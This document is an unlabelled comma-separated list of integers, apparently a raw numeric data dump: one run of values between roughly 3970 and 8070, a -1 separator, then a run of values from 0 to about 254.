7417,6499,5789,4535,6976,6586,6380,7858,6792,5865,5289,6632,4761,6287,4553,7297,4914,4640,6439,4804,6367,7857,5145,4763,7087,7699,4132,6836,5271,8015,5074,4486,5459,6949,5688,7661,6497,4534,7029,5026,4154,6824,5670,6885,5161,5528,4531,6592,7739,6940,5475,7894,5197,5861,6463,5341,4728,4610,5013,7215,6583,4458,5411,6272,7878,7201,4733,7109,4849,5609,5141,4685,6241,4860,4647,7359,6630,6533,4151,5674,5534,4379,6430,8065,5693,5819,5443,7904,4261,7629,6155,5995,5933,6761,4774,6925,7136,7693,7501,6806,4506,7212,6703,5383,6072,4498,6324,6879,6735,7819,5168,7030,7054,6181,4303,6760,6354,7101,7564,6438,3999,7897,5925,6224,7728,4525,4811,4284,4596,7084,6188,5705,6738,6986,4208,6951,5690,7970,5709,6906,7939,5805,6468,4985,6675,5385,6455,6087,6724,6709,7055,6395,5129,5541,6552,4568,4865,4704,6547,6614,4780,5885,5372,7542,6197,5444,5999,7718,5059,6392,4883,5953,7258,5914,5205,4870,5678,4061,6835,7792,6261,4557,4074,5711,4921,6394,7977,5860,4455,6795,7558,4971,7480,6334,5821,6399,7861,7876,6716,7453,7371,4396,6024,4196,7155,7267,7749,5121,7352,6175,6377,4675,5833,5159,5783,7727,3996,5384,4881,4930,4226,5791,6249,6728,6383,6640,6480,4027,5227,7056,7373,6382,4368,4840,7960,6446,4907,4354,4002,6163,6542,5826,7654,6084,8006,6771,5567,5357,6462,8051,6910,7883,6648,5809,5733,8004,7022,5275,5102,6685,6641,6113,4069,6276,6598,7744,7983,6950,5135,5618,4702,6043,7973,7044,7487,6359,5038,6736,5546,5815,5975,6895,7675,5214,7713,6507,5797,4828,4802,6365,6747,4297,4522,5879,5002,6263,7903,4744,5629,7066,7530,3992,8043,4308,7747,4210,4359,6768,5425,7163,7204,7393,4618,4334,6294,3994,4949,5010,4363,4876,5537,6572,7824,5031,7069,4659,4403,7333,5328,6388,4615,6855,6360,7482,6964,4798,5594,6793,4968,6226,5431,7448,6341,5940,5652,6165,7249,6214,6019,4092,7436,4984,6008,6264,4527,7342,6424,4464,4497,5421,6000,4122,6432,6817,6657,4976,7254,7086,5521,4927,4992,8010,6376,8013,5279,5598,6490,4030,5795,5900,4333,4213,5908,5015,5926,5942,8071,6683,6244,4677,4370,7733,5053,7422,5794,5472,5104,7593,6312,5137,5961,6638,4205,7167,7585,5526,7944,7664,7660,6613,5375,4987,7596,7669,5736,5305,4052,4807,5193,6092,5947,5611,6318,5530,7208,8031,4983,7668,4019,5803,6148,7224,4742,4407,4674,5519,5052,4609,5045,7340,5970,7115,4349,4075,5649,5706,4009,4417,6539,6230,4250,7354,4007,5273,5324,4572,4422,4658,7679,6652,7570,5417,7331,6807,5358,7133,6095,4762,6193,4975,4392,5717,5264,7456,6733,7316,5777,6185,7556,5516,4425,4203,6058,4319,6850,6681,6009,5662,7957,7748,5907,7132,7707,5020,7507,6770,7300,7509,4249,4838,4680,4645,6027,6939,6153,5387,4727,5591,6491,5177,5120,7988,5473,5579,5636,6262,4020,7650,4499,7463,5409,4335,6882,5891,5920,6693,5136,7188,5841,5370,7306,6992,6629,7414,6164,5771,6305,4739,5415,4725,6038,5235,6674,8067,6942,6099,5266,5515,4766,5040,5362,7251,6557,5817,7437,7014,7642,5456,5398,5753,6827,7345,7640,6297,5855,6258,7491,6501,6961,5616,7317,6773,6414,5184,4072,7262,5741,6386,7205,4295,5801,7420,5068,7141,4814,7619,7818,7885,6221,4599,6604,6440,6474,5173,7898,8044,5414,4859,5458,7276,6470,6344,5976,4559,4536,5125,5072,4131,6102,6136,4188,5588,5784,5870,5738,7500,6668,5832,6930,7018,7336,4539,7506,6606,5107,4336,7969,7193,6067,7706,6800,7620,7704,7404,5426,7046,7064,5089,4915,7164,4974,4461,4482,5424,6020,4764,6129,5928,7909,8026,6173,5749,5979,6511,4759,7063,7004,4366,6620,6156,6829,6803,5212,6624,5238,4809,5593,6373,4454,7418,4017,6665,5462,6229,5518,5702,4523,6686,4112,7256,7696,4649,4919,6902,6544,4753,7527,6937,5007,4504,7891,5578,4941,6886,7374,6492,4387,6955,6739,6189,6757,5877,4626,5573,7098,4369,5488,5142,6115,6253,6834,4325,6421,4700,6366,5066,7396,5957,4345,4769,4155,5508,4635,6596,4939,5215,5691,5203,7815,6443,5569,5552,7247,4032,4632,7832,7199,4287,7543,6884,4989,5554,5280,4135,4450,5267,7369,7906,5862,4137,7469,4089,6022,6692,7160,7129,6673,7319,4990,7871,4307,5469,6562,5814,6168,4023,4085,6218,7504,5027,4161,6954,7397,4644,7716,5551,5454,6458,7335,7758,5580,7994,6025,4787,4785,7546,5864,6304,5723,6907,4429,5587,6508,7365,6602,5196,7104,6658,7657,4477,6618,4484,7518,4223,7839,4430,4653,4905,5876,5335,7099,7182,4858,6068,4172,4130,5499,4871,6565,7628,5563,7773,7880,7217,4418,7049,7651,4389,4869,7774,7301,7538,5449,6498,5840,4457,7853,5941,6678,6428,6732,5349,4792,4087,4743,5130,3986,5581,7813,6313,6863,5952,6029,5485,7877,5919,4590,6758,3973,5770,4934,5686,5352,7012,7124,7313,4452,6465,4652,7652,7307,6157,7914,6457,7616,6441,4328,5681,7011,5224,6385,3987,7211,4344,6797,6616,6488,7272,7323,8042,5494,6378,7603,7918,7248,6504,4444,5365,4991,5776,7165,5659,7459,8014,6653,7114,6110,4799,7394,4962,4332,5767,4046,4481,5559,4438,4821,4036,5641,4360,4833,7846,4584,4315,5069,4283,6219,4071,6841,7406,6545,7460,4281,4384,4148,7569,6880,5757,4933,7810,4749,4320,6699,7286,5555,7771,4820,5744,4232,7605,6718,5174,5684,5420,4116,6289,7950,4088,5823,6410,4854,5951,7695,6588,6059,7676,6538,6429,5769,7048,5643,6199,5440,4587,6251,6358,7712,4153,7102,4517,5041,5290,7513,5737,5682,7843,5613,5169,7016,4111,4686,5028,4969,7277,5122,5307,6979,7579,5206,6643,6016,4471,7948,7943,5388,5024,7379,4456,5854,5067,7271,5888,4552,6897,5029,7592,7183,7259,4050,7578,8003,4273,7974,5894,7451,5448,4238,6519,7145,4569,4419,5704,7412,4889,4920,7173,7284,4661,5319,5106,4244,4184,7388,6170,6231,5631,4010,4773,7138,6706,7550,5742,4571,7231,5317,7916,6785,6846,4049,7070,4156,7447,7921,6120,4583,5679,4521,7531,6247,4917,4100,6192,6489,5982,5032,5318,5157,5973,7523,6203,6418,5852,7776,4394,5634,4845,6705,5967,7575,4362,5818,6010,5147,6953,4001,4190,7515,8061,4472,5622,5393,6764,4388,7514,5858,4409,7322,4902,6730,4786,5570,6467,4163,5911,7588,4688,4997,6211,7458,5909,4841,7051,5583,5964,4758,7788,5382,7449,4398,7071,6169,6659,5707,6854,5915,5112,4936,7216,7304,7791,6654,7077,5935,7919,4683,5700,4097,4228,6932,5949,4121,6111,7547,5992,4579,5348,5760,6390,7008,6338,6978,6032,4815,5666,7002,7808,6921,5642,4449,5105,7987,7981,7837,6220,6554,5843,8054,7384,5931,4627,3991,6778,5401,7498,5726,5713,6564,4451,3995,5117,4432,7074,5983,7643,6028,6715,5752,5022,4350,7093,4616,4699,4650,5221,7339,7038,6176,4979,4469,4855,4312,6077,4716,4453,5299,6548,7147,6848,7986,4994,7670,7795,7315,7488,7026,4473,7303,4275,5133,7377,7076,4892,6837,5597,6584,7519,7644,4912,6563,7146,7587,5651,5098,7868,5060,5623,5429,7775,6927,6599,6391,6434,7589,8048,5589,7314,5321,5330,4060,8072,8070,7537,7017,7159,5630,4518,7923,7626,5663,6595,6409,7852,4868,6862,5859,6913,4831,4024,5291,7474,7385,6198,5044,7402,4214,4898,4485,7780,5696,4967,7836,7915,6006,6469,7951,7841,5808,7408,7692,7946,4850,4331,4339,7548,4671,5884,6843,6860,6804,4614,7781,4410,4935,6811,7281,4265,5162,6691,6021,5253,7763,7001,4670,4367,7936,6694,6663,5599,5656,6314,6275,4507,5792,4296,6268,4351,7847,5820,5084,6433,7554,7729,4216,7922,7665,7690,7486,7112,5824,7257,6160,6672,8027,5493,5438,4712,5916,6994,7834,7925,6310,4768,4175,7663,6486,5735,4672,4385,6265,4285,4966,4365,7635,5346,6396,6866,7270,6461,4189,5345,5635,6963,5955,7250,6042,5556,5057,4276,6809,7383,7021,7615,7000,7722,4884,4633,6928,5077,5457,5766,6342,4288,5156,7510,7209,7230,5148,4730,6375,4289,5182,8021,7627,7938,7075,5034,4056,5988,6746,4922,6704,7398,6790,7966,6636,5313,3977,4718,7484,7803,6086,7493,4779,4380,7131,6609,7169,4642,5956,4038,7800,6103,7614,8038,4894,7829,3998,7828,4478,5019,5724,7705,6147,4293,6909,7882,5160,7520,6322,5799,4948,7899,5848,7320,7863,5977,4629,4413,4800,7535,5295,6002,4952,7831,6477,6772,5830,4641,8045,5021,6787,4103,6603,5436,5676,6464,4909,7386,6026,6180,6710,5487,4896,6104,7360,4943,7407,7833,6765,7811,5924,6513,6550,7804,5315,5853,4193,6844,4837,7689,7492,4689,6794,4495,6445,5584,6267,5620,4064,5991,7634,4808,6194,5240,4108,6340,5263,5144,4000,7990,7409,5304,4402,7207,4357,5561,7263,6285,6420,6200,6527,6677,6134,6459,7574,5016,5351,4589,4598,4139,5692,4079,4612,6369,6832,7378,8018,7606,7848,6523,4219,7536,7751,5055,7426,4012,6330,5954,5998,4512,6183,5405,6776,4280,5549,6600,4182,6442,5990,5049,4923,7062,7794,8030,6671,4004,7455,5312,5333,5316,6853,5606,6775,5512,5509,7827,5392,6568,6571,7191,6106,5946,5965,4738,4412,6209,5938,7302,5188,6845,7854,5423,7830,4141,7452,5661,4562,4775,4305,7584,5005,5476,5076,7043,4524,7255,6456,5360,4931,5373,4548,6336,5506,7572,4479,5165,7999,6288,5575,6762,6225,4003,7221,6664,6983,5595,7006,6487,6427,5301,6126,6520,4995,6645,5217,4690,5011,6551,5695,4682,7875,4601,6697,7622,6911,5790,4352,4861,7238,6239,6273,4993,7673,7200,6278,7809,4772,4171,7464,6611,4290,4234,5199,6121,5085,5198,7549,4143,7438,7111,5465,4681,6062,6960,5796,7512,5937,5839,5958,4426,7667,7932,4623,4420,5523,4816,6540,4039,8049,4501,5471,7024,6323,7952,6987,5962,7737,6371,4795,6079,6298,7964,5510,4241,6828,4732,4209,4055,4399,7849,5276,6311,4678,5094,7198,6082,7184,6780,7823,6969,8058,4602,6891,7444,7778,5600,6702,6473,5247,5608,7666,5628,7060,4543,7073,5539,6750,5927,7565,4706,6858,5422,6894,7674,5605,4857,4225,7844,7762,5228,5371,7822,6577,6559,7168,6089,4167,7511,5251,6516,6004,5837,5540,7567,5229,4973,7443,7534,5363,7746,6417,7429,5921,6190,7711,4886,7096,4891,4054,7902,4204,4286,6576,7731,5230,4887,6407,5878,6319,4605,3989,4053,7658,6005,7222,5571,4246,4269,7765,7551,7403,6138,6236,5298,7423,5140,4207,6422,6233,7715,4129,7703,6676,7879,5544,7380,6356,5050,6154,7610,5320,7326,6573,7708,5743,4202,4374,6352,6754,4619,7298,6240,6423,5437,5314,4950,5124,6300,4755,5972,6496,4329,4911,5366,5764,4631,4200,5785,6124,5604,5103,4125,7736,4890,4805,6405,5249,4550,5232,4233,4174,5816,6999,5146,6112,7031,6929,4691,5282,7321,4551,5617,4224,7125,7400,4714,4895,4260,7752,6988,4347,5748,6741,7625,5225,7802,6881,8037,7886,5139,5309,6260,4544,5006,4215,5722,6731,4705,6403,5762,5009,4022,5871,7581,6133,7600,7332,5632,4120,6926,4903,5207,6637,5131,4229,8025,6125,6734,6210,5244,5220,7144,7310,6791,4445,4842,4080,7621,7910,8000,6561,5971,4964,5322,6495,6483,7375,6904,7338,4178,5701,5250,7571,4665,7483,6957,6864,4878,6984,8008,5655,4564,7028,4928,4709,6384,8009,7540,4558,8020,4310,6670,5755,5051,6202,6647,6666,4621,8040,4877,6717,5543,5354,4104,6852,5490,7095,6071,6948,6471,7275,7721,7724,4708,7965,7639,5278,4508,7907,5058,7289,4084,5734,6869,7395,6083,6481,6364,7881,5883,5427,4395,5550,6143,7892,6820,5873,5342,5996,7120,5374,7353,4371,6549,5851,4086,6031,7691,4262,5810,5404,5408,4435,4324,7218,4166,7137,5750,7552,4622,5150,4490,6759,4628,4790,6060,7979,4082,6184,5687,5576,5502,4252,7655,6245,5037,7930,6656,7072,5163,4063,5786,5887,4008,5023,5535,4657,5653,7067,7128,6696,7612,7261,5828,5778,4021,4735,6182,4581,5621,7710,7624,4173,6374,7953,7260,8032,5834,4687,4314,7989,7505,4695,4556,6679,6370,6889,4829,5239,6875,6349,7346,5361,7100,4340,7937,5302,7324,6859,5585,6543,6282,6355,4600,5481,5936,5090,5993,7435,5768,4684,7760,5061,4309,4637,6151,6826,5118,5075,6387,5698,7524,5943,7528,6014,6076,4424,5730,4737,4526,7701,4364,6872,4986,5155,6381,5675,4757,6967,4803,4913,4906,4977,5647,5441,7865,5811,7602,5153,7085,7591,4701,7698,5286,4466,4447,6522,6919,5503,6096,6485,5234,6944,6408,5974,5281,6833,5577,4563,7039,4493,5800,7770,7607,4404,5183,6128,4729,4057,6291,4240,4781,4533,7734,5179,7283,4047,5644,6789,6216,5082,7253,4867,7590,5359,6865,6908,6783,5395,4998,5673,5479,6347,6822,5311,4127,6167,5110,6056,4904,7349,4383,4029,5083,5260,7197,5582,6924,7389,5944,5377,4391,7845,5218,6849,4636,7052,7709,7089,5654,4235,6555,6737,5665,4778,7557,5100,7929,5310,6553,4058,6646,4266,6655,7648,7522,6317,7730,4586,6484,4016,7150,4264,5721,5252,4474,6708,4459,4791,5178,8022,4068,6560,6726,7594,5211,6074,4487,7490,5134,4341,4565,6801,7821,5167,4201,6972,4095,6525,5151,6639,7292,5986,7440,6900,5615,4592,4146,5265,4694,7045,4170,4227,5917,7445,5394,6935,5626,5498,5511,5495,4947,6063,7387,7171,7179,6018,7152,4580,5399,6977,5453,6161,4736,4597,4874,7234,5732,5781,6847,5677,6649,5430,4545,7597,6923,5984,7143,6786,7357,4830,4390,6131,4434,7684,6307,5881,6585,6959,4654,5033,5703,7927,7019,7560,4856,6332,6650,5452,6587,6308,5277,6936,4476,6041,7993,6357,7888,7210,7653,4570,6339,5445,6591,5186,6132,4291,4734,4162,5248,5181,7080,4491,7544,6995,5101,5204,5646,6080,6570,4862,4720,6166,6293,7799,4851,7041,4676,6130,5474,4673,6934,8050,5520,6454,7372,5902,4149,5008,6179,5772,7767,4035,6500,7867,4376,5466,7566,4538,5657,8016,4393,7061,7638,8001,4316,6719,5901,6973,7835,6393,4810,7363,4492,7561,5994,5831,7477,4138,5739,7671,-1,24,21,69,34,104,17,26,31,7,69,94,99,6,48,121,57,26,21,29,0,7,11,57,108,12,110,100,61,87,95,92,1,36,76,36,23,37,112,72,83,52,88,12,103,70,29,28,73,22,0,0,17,188,28,29,56,14,98,153,19,108,36,7,1,96,46,80,84,99,8,67,0,2,24,48,1,67,95,11,4,32,58,84,73,69,1,20,85,0,3,100,67,62,0,88,1,14,38,66,0,78,14,120,1,95,13,95,110,100,69,66,21,35,29,49,31,95,125,9,76,82,2,59,26,52,6,29,78,108,0,68,71,68,99,7,10,18,27,111,25,58,19,110,10,38,78,35,57,26,21,53,97,0,88,7,76,26,22,67,47,104,125,1,7,36,85,56,160,28,28,93,56,17,87,15,73,69,3,24,68,94,35,71,23,21,17,84,74,78,58,21,85,19,3,47,108,0,0,65,49,8,26,50,64,26,54,46,231,122,39,176,84,23,16,1,58,72,75,123,26,53,90,0,54,17,0,15,46,90,58,12,103,83,10,73,10,19,0,17,113,17,76,12,73,28,28,100,108,45,103,82,60,73,7,8,101,55,0,53,68,53,26,26,5,70,47,23,26,123,128,92,92,12,37,23,84,99,22,31,77,48,61,27,35,201,45,61,56,58,71,90,4,11,21,108,9,95,57,47,94,90,25,69,95,46,95,14,6,21,0,28,59,104,17,94,26,21,1,112,83,64,0,51,23,17,135,64,37,97,80,111,36,61,84,7,29,70,92,2,78,11,108,6,52,68,97,54,7,29,179,61,94,6,67,36,41,55,12,21,29,58,38,17,83,185,97,5,74,26,124,35,123,24,45,70,85,108,92,7,46,17,93,29,104,4,27,105,104,65,97,95,84,126,68,23,25,7,70,21,1,95,14,25,95,53,17,0,1,0,29,92,26,118,12,77,50,99,22,126,91,121,26,29,126,103,95,68,1,100,14,73,1,84,107,66,136,39,17,4,54,94,10,18,170,69,71,1,21,104,104,124,77,11,53,37,104,27,70,183,11,35,6,9,0,29,67,4,108,127,31,27,41,11,84,126,109,92,75,59,110,82,92,92,80,122,17,67,113,121,125,57,73,234,111,52,208,0,10,93,58,22,73,46,92,109,89,23,60,82,107,94,68,74,126,25,52,0,90,108,0,64,53,7,80,68,22,85,58,53,58,58,7,83,26,0,56,107,115,107,97,0,11,28,95,30,23,228,59,120,21,46,17,121,72,17,9,58,68,41,23,15,94,27,111,55,66,7,21,21,82,71,2,127,28,20,28,96,66,11,21,11,66,94,6,24,68,127,47,44,112,94,7,29,37,4,29,40,7,14,22,88,71,46,104,120,86,9,58,24,121,75,17,11,61,92,1,66,46,2,74,96,121,12,86,75,30,47,71,27,65,82,169,36,0,0,125,29,59,28,65,51,72,58,27,18,21,104,90,29,47,15,98,107,53,111,23,96,62,28,9,91,95,107,29,74,62,83,67,26,26,11,92,32,35,17,66,125,73,107,85,117,52,47,55,77,0,121,26,69,97,47,60,26,53,23,84,21,15,18,14,15,73,92,95,51,21,17,26,126,36,54,94,54,13,16,90,3,32,95,187,57,47,17,99,83,25,6,27,26,0,47,73,19,36,69,23,0,143,4,54,95,121,125,77,96,94,92,29,10,56,0,93,21,84,53,77,115,89,28,122,37,60,56,7,57,123,84,10,87,65,10,84,0,57,69,11,0,13,83,28,39,46,85,41,17,29,40,226,19,29,2,21,0,24,251,86,113,49,17,47,1,16,24,41,0,49,15,22,27,109,30,0,29,7,23,30,46,12,81,21,7,68,88,65,90,1,88,64,7,69,111,20,11,6,67,4,39,92,77,84,76,10,15,40,40,1,37,39,110,33,125,35,27,145,85,95,66,64,108,96,66,19,109,10,84,36,27,94,11,0,0,1,92,8,19,27,84,6,62,39,52,2,109,67,122,4,69,6,66,26,22,123,108,16,72,81,121,28,69,47,6,52,154,47,116,69,50,62,73,47,22,2,127,70,121,89,92,27,60,4,14,11,73,108,72,126,40,123,1,73,42,45,24,64,47,110,74,24,14,70,94,37,85,26,108,92,50,18,87,32,0,17,29,76,97,26,75,12,68,15,89,30,21,33,28,15,54,69,21,41,6,8,81,110,57,93,52,23,62,15,27,69,21,7,69,79,69,82,79,47,7,17,47,99,36,95,13,112,71,31,95,10,115,67,108,11,17,104,78,254,104,125,23,82,0,97,7,64,94,94,21,75,4,11,77,36,15,12,110,12,7,85,103,6,68,89,78,119,35,86,57,19,6,28,186,94,37,90,113,94,11,55,2,97,36,27,10,122,91,12,0,121,21,51,66,38,54,99,9,36,89,84,2,115,121,126,40,69,94,112,84,29,29,97,37,5,125,69,81,7,60,26,104,29,21,6,12,94,68,4,2,99,16,50,65,86,88,17,36,0,2,94,22,89,95,103,59,57,58,7,16,49,28,1,78,81,7,52,121,16,61,112,36,110,73,2,39,88,97,29,9,16,26,83,18,26,15,0,99,23,95,36,122,13,44,36,25,30,5,29,116,49,58,46,113,47,26,121,28,67,17,24,14,21,81,39,91,29,75,26,61,91,28,18,46,73,63,96,75,52,76,79,7,90,22,0,95,111,60,53,23,4,68,123,40,54,77,95,0,11,22,28,31,88,30,85,29,53,29,15,95,56,6,70,21,16,18,26,103,3,101,38,9,1,6,97,38,11,29,50,29,28,22,80,17,63,23,30,64,16,67,36,17,74,16,36,80,104,109,85,88,0,12,23,6,7,30,27,0,26,0,46,57,69,0,36,104,16,95,16,53,22,6,40,70,34,68,17,58,66,51,72,69,50,0,69,11,104,67,25,22,84,29,11,26,73,104,15,83,81,27,108,40,127,104,17,27,88,0,69,20,79,7,26,1,91,87,89,36,96,110,24,7,100,44,55,76,85,0,25,91,36,0,36,17,28,88,70,73,6,90,2,46,44,0,85,123,98,52,4,125,41,75,243,29,91,6,52,29,29,14,97,53,51,90,22,12,85,46,8,46,83,63,88,67,73,111,73,21,61,28,80,94,31,124,126,26,36,26,24,17,1,11,68,99,124,231,78,97,16,23,17,23,22,60,108,19,61,94,105,100,83,125,97,9,61,72,61,0,224,24,10,17,162,53,0,58,73,15,85,85,31,68,0,88,6,17,27,18,7,50,127,58,28,26,46,108,28,26,85,60,18,21,69,123,17,85,18,108,6,105,29,15,121,69,83,72,41,93,57,17,77,1,24,68,89,104,35,3,17,22,12,99,96,22,245,27,90,7,83,73,2,0,125,79,0,1,104,73,29,11,94,6,124,126,16,12,90,19,24,10,13,28,0,47,85,56,23,3,68,69,126,111,17,0,121,48,107,32,53,84,182,72,21,53,12,83,52,28,83,22,9,126,90,22,27,49,22,104,0,81,30,23,220,26,76,126,83,63,23,88,17,17,94,106,23,12,14,90,39,126,27,0,29,30,29,78,18,31,73,26,39,47,53,47,12,26,1,48,16,23,12,94,66,84,26,91,11,94,47,53,7,113,28,6,17,104,47,69,111,41,47,121,14,26,121,59,67,12,28,124,53,111,1,92,109,36,53,28,20,47,40,126,46,86,36,48,95,46,76,67,89,37,93,68,70,24,32,93,56,17,17,45,104,23,58,29,10,8,80,1,69,99,68,120,95,108,96,84,4,59,36,0,57,38,100,12,82,91,98,24,7,16,1,47,12,82,15,85,0,0,46,107,76,78,50,67,46,69,17,29,21,23,0,113,3,7,96,52,78,11,94,92,99,7,64,23,22,7,28,0,26,23,32,21,47,85,36,0,55,90,69,0,15,65,29,28,126,28,5,92,26,6,0,28,27,1,59,15,120,10,22,58,29,2,77,47,84,52,92,55,89,69,1,8,7,27,88,17,3,75,95,84,27,69,95,9,104,97,104,37,21,99,40,90,97,68,46,122,0,81,16,31,50,19,49,3,16,16,79,12,25,84,125,83,21,21,28,26,53,35,73,85,12,37,45,113,6,7,2,97,34,90,1,0,50,30,40,46,74,53,1,34,29,59,94,0,84,10,28,83,99,28,88,36,5,88,96,77,69,25,73,65,51,92,99,66,111,66,11,26,14,40,24,68,84,36,101,10,29,29,71,49,26,4,17,69,94,26,92,62,3,47,94,52,44,121,6,9,11,56,25,93,61,0,56,38,30,46,60,49,91,88,12,104,12,2,113,6,123,119,82,12,8,21,99,101,53,87,35,93,240,52,0,10,25,18,121,90,17,23,29,10,46,29,27,26,38,65,25,64,1,15,38,56,95,125,23,67,16,4,159,107,83,104,52,52,28,85,28,81,104,113,126,61,97,57,40,27,0,88,85,12,16,93,85,52,59,66,90,95,23,104,28,17,83,83,91,27,57,66,11,26,72,95,21,15,67,53,6,53,13,104,5,16,117,1,16,105,19,17,90,57,73,111,28,108,13,113,27,7,28,10,4,6,50,48,90,114,66,44,93,127,94,80,105,25,111,69,81,52,104,53,94,4,29,50,9,51,27,85,21,23,95,121,11,38,89,22,10,16,92,126,78,124,77,6,105,50,17,47,8,62,68,7,21,23,20,73,104,4,73,38,58,68,6,113,19,59,9,69,51,17,90,68,95,36,94,19,31,16,17,52,7,67,90,48,53,26,49,18,131,112,47,96,3,7,47,29,81,0,120,69,99,74,53,105,52,39,22,24,169,95,83,51,78,21,66,92,104,51,94,35,26,104,50,53,69,20,83,11,17,79,54,90,92,12,89,60,11,28,92,22,121,78,94,127,63,65,28,17,66,103,50,43,29,68,26,15,16,51,111,31,14,20,75,1,82,17,85,7,164,34,108,11,4,46,37,127,69,29,28,84,7,93,0,18,64,68,27,16,21,16,83,12,70,26,124,93,87,41,11,0,36,206,53,22,24,59,44,3,1,17,46,34,80,46,2,95,85,27,22,2,51,8,126,6,36,85,124,99,29,12,81,25,27,50,126,20,57,90,69,73,7,16,37,77,39,6,27,49,93,46,69,122,22,53,21,1,121,7,23,18,2,47,29,216,3,71,7,13,94,11,0,99,73,66,84,29,68,35,6,72,60,23,94,29,61,53,76,28,0,83,96,22,0,95,101,19,16,92,94,19,96,28,11,30,70,12,16,36,18,27,49,51,0,99,254,100,30,4,35,15,52,23,84,23,41,76,77,15,17,105,27,6,53,27,29,14,1,124,17,107,69,91,6,7,6,14,118,160,37,81,46,44,28,121,25,81,67,31,25,123,10,39,26,66,28,69,18,69,29,68,89,26,0,110,96,83,21,40,26,71,98,113,53,0,94,92,32,51,95,92,1,62,69,31,7,1,45,109,32,20,74,73,29,66,46,53,52,36,14,59,47,94,11,28,16,21,56,104,37,53,20,99,21,65,8,66,13,53,65,17,57,5,76,119,90,7,66,57,104,17,16,53,90,89,13,57,72,112,16,37,37,7,59,6,94,84,2,0,126,92,88,26,19,10,2,72,16,17,12,52,47,75,121,33,56,52,37,28,75,13,55,56,33,17,73,92,90,87,83,12,26,46,127,23,28,69,91,36,7,52,20,62,73,16,91,82,13,26,107,18,52,110,111,65,32,6,74,76,23,61,7,78,95,0,67,12,126,66,26,2,52,96,47,100,98,202,95,64,17,7,0,125,70,27,65,80,12,105,17,39,104,51,71,10,21,66,15,24,77,117,51,0,17,47,34,84,92,50,59,21,15,4,1,81,81,20,38,35,4,114,29,12,45,80,115,82,85,31,16,112,123,10,81,109,29,88,80,87,29,28,10,17,44,11,48,40,21,18,32,197,1,39,78,84,10,78,71,35,7,95,29,4,29,72,46,85,90,31,41,68,17,0,84,11,18,1,40,116,75,10,4,70,14,15,59,107,97,10,71,27,1,77,17,6,85,10,31,77,91,27,117,9,48,15,65,12,32,96,21,11,4,27,84,12,0,28,246,94,8,34,66,97,22,4,46,126,92,22,90,27,42,17,95,79,123,22,108,50,25,114,109,47,36,46,99,94,9,50,17,7,4,91,1,27,101,3,19,69,114,85,6,27,10,16,68,37,11,111,69,89,68,20,21,57,95,4,104,78,3,1,66,29,86,68,74,104,18,19,18,81,7,11,86,9,122,28,32,55,125,68,84,23,60,151,126,31,10,4,26,79,21,53,23,71,68,111,104,56,98,47,94,64,12,89,4,29,85,65,35,46,83,33,126,84,1,14,46,0,58,64,32,66,76,68,66,38,79,126,67,94,122,23,20,28,93,37,1,84,17,53,96,103,108,11,80,17,75,13,1,28,95,50,92,50,2,30,63,105,11,57,95,124,24,0,23,12,80,0,27,17,108,84,2,16,60,86,94,0,48,126,23,21,13,32,0,7,92,16,136,54,85,107,24,69,48,46,25,67,53,7,90,113,6,46,94,84,32,86,4,29,97,90,127,123,111,46,23,48,66,32,47,46,74,69,78,12,28,67,122,16,6,121,88,87,11,35,46,122,95,93,72,0,47,98,89,27,85,52,24,3,20,73,68,10,36,27,11,144,8,213,28,94,57,27,60,29,4,66,95,59,17,28,99,95,123,115,93,27,53,59,73,0,99,105,111,39,77,94,67,59,10,35,7,34,16,253,121,104,89,84,27,56,39,23,12,123,69,84,69,104,94,94,52,15,8,29,75,92,46,87,73,29,64,16,45,92,29,109,52,51,67,25,46,79,10,26,115,77,2,69,49,7,79,68,92,40,69,27,118,95,37,4,70,52,56,37,10,23,120,13,90,53,40,32,0,0,53,69,72,22,56,80,91,65,84,107,84,22,77,26,46,57,17,104,111,49,25,76,0,104,1,121,17,65,16,0,80,76,52,75,9,17,27,67,95,10,15,46,22,77,105,176,29,103,26,95,66,52,108,164,99,88,64,95,118,104,56,122,3,93,104,69,77,9,109,34,211,13,11,91,26,121,72,95,20,75,27,83,0,97,53,52,5,51,52,90,100,84,0,68,113,117,34,82,57,40,60,58,41,23,111,12,99,6,84,73,41,72,47,64,66,71,17,96,82,16,17,26,47,108,30,46,4,91,46,9,39,52,47,84,0,0,69,82,15,46,10,65,60,29,103,26,10,104,23,1,90,52,61,68,38,17,10,23,83,107,17,37,19,72,93,90,10,0,23,81,17,52,88,204,0,26,15,80,26,2,123,69,21,68,78,12,30,26,0,89,35,14,13,83,80,2,21,104,2,32,229,7,110,39,76,36,2,88,0,0,29,96,68,0,72,18,58,75,20,11,70,60,72,11,53,29,21,46,26,0,85,28,36,36,26,82,39,28,17,23,26,47,47,163,84,23,99,125,74,41,101,56,24,149,70,27,11,99,8,7,0,0,121,4,122,3,39,94,91,44,37,98,26,249,86,98,63,35,137,65,74,98,69,57,0,21,30,80,116,83,39,7,237,53,16,18,53,11,22,47,85,4,0,65,16,52,25,28,3,27,113,0,64,64,21,111,96,35,13,99,29,35,81,46,32,51,66,50,54,37,46,18,95,78,84,28,74,67,25,46,21,17,95,0,33,81,32,65,104,0,71,11,92,111,54,46,94,103,96,17,18,44,127,53,35,0,36,51,26,17,71,104,94,52,23,1,108,88,69,44,124,63,47,29,100,43,85,78,127,29,124,96,94,11,17,95,29,67,28,72,17,104,84,51,127,82,57,77,16,0,47,53,68,28,22,64,69,78,6,75,83,88,109,6,17,59,37,84,77,29,6,73,64,8,74,104,6,23,95,56,15,27,26,63,11,94,30,1,28,84,89,86,92,27,79,76,66,56,92,93,21,14,23,105,127,75,77,23,1,123,29,30,68,65,103,37,64,76,30,24,35,40,1,53,125,17,86,1,89,69,63,64,120,122,7,2,29,33,78,51,95,68,28,23,68,26,28,29,69,2,30,66,84,57,80,71,60,28,94,21,29,12,12,27,92,127,47,29,76,23,122,40,75,80,23,66,85,84,127,11,3,29,10,52,53,111,0,69,126,23,85,73,19,109,60,28,27,89,56,22,6,75,8,6,7,91,16,3,26,73,6,105,0,6,84,21,47,72,13,27,9,88,1,104,20,27,123,121,5,79,98,23,47,47,123,96,10,92,98,20,47,53,65,66,82,0,4,67,57,83,70,38,59,76,78,26,1,23,103,10,12,13,127,14,95,23,69,28,0,111,60,28,17,110,120,15,18,51,126,31,64,65,31,19,100,121,5,26,44,23,92,32,18,28,40,22,38,11,30,80,44,69,16,36,84,78,72,2,120,24,28,33,18,28,88,29,104,17,24,22,7,70,1,95,19,96,1,84,126,27,39,35,90,10,97,11,32,55,75,7,89,15,123,11,83,6,18,75,90,29,99,2,46,68,122,92,94,0,4,26,219,6,15,17,6,2,69,10,56,61,100,8,107,21,69,30,7,51,6,113,34,72,17,